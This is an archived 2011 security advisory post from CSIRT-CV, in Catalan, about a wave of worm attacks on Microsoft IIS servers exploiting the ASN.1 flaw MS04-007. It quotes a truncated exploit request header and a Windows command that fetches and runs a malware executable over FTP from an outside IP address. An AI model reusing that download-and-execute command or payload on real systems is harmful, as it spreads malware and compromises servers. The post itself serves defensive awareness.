Está usted visitando una publicación en la hemeroteca de CSIRT-CV.
Para acceder al portal y contenido actual, visite https://www.csirtcv.gva.es
17/02/2011
Tornen vells coneguts. Atacs massius a servidors IIS
Recentment hem detectat una nova tendència en els atacs a servidors web IIS. Els atacs intenten explotar una vella vulnerabilitat de 2004, en els servidors web de Microsoft. És habitual que malwares antics, encara continuen funcionant anys després del seu gran apogeu, ja que moltes màquines no s'actualitzen correctament i continuen sent vulnerables.
El que ja no és tan comú és que anys després hi haja un augment tan elevat d'atacs, sent aquests de distints orígens.
Els atacs provenen de tot el món (en el cas de la imatge; USA, Índia, Japó, Rússia, Taiwan… ) i en un breu espai de temps. En concret, els atacs que es reben són al port 80, on s'obtenen peticions del tipus:
GET / HTTP/1.0
Host: XXX.XXX.XXX.XXX
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU…
Després d'una ràpida investigació, el mes probable és que s'estiga intentant explotar la vulnerabilitat d'ASN.1, detallada en MS04-007 i en SANS.edu.
L'atac realitza el següent:
1r) Executa l'exploit.
2n) Si té èxit, obri un servidor ftp en el port 21.
3r) Una vegada obert el port, es descarrega el codi maliciós (malware) amb una orde com la següent:
cmd /c tire open 210.134.62.199 21 > o&echo user 1 1 >> o &echo get Rewetsr.Exe >> o &echo quit >> o &ftp -n -s:o &Rewetsr.Exe
4t) Executa el codi maliciós (malware), s'infecta i torna a realitzar el mateix atac per a propagar-se a altres sistemes.
Podeu continuar llegint aquesta notícia en http://www.securityartwork.es/2011/02/10/vuelven-los-viejos-conocidos/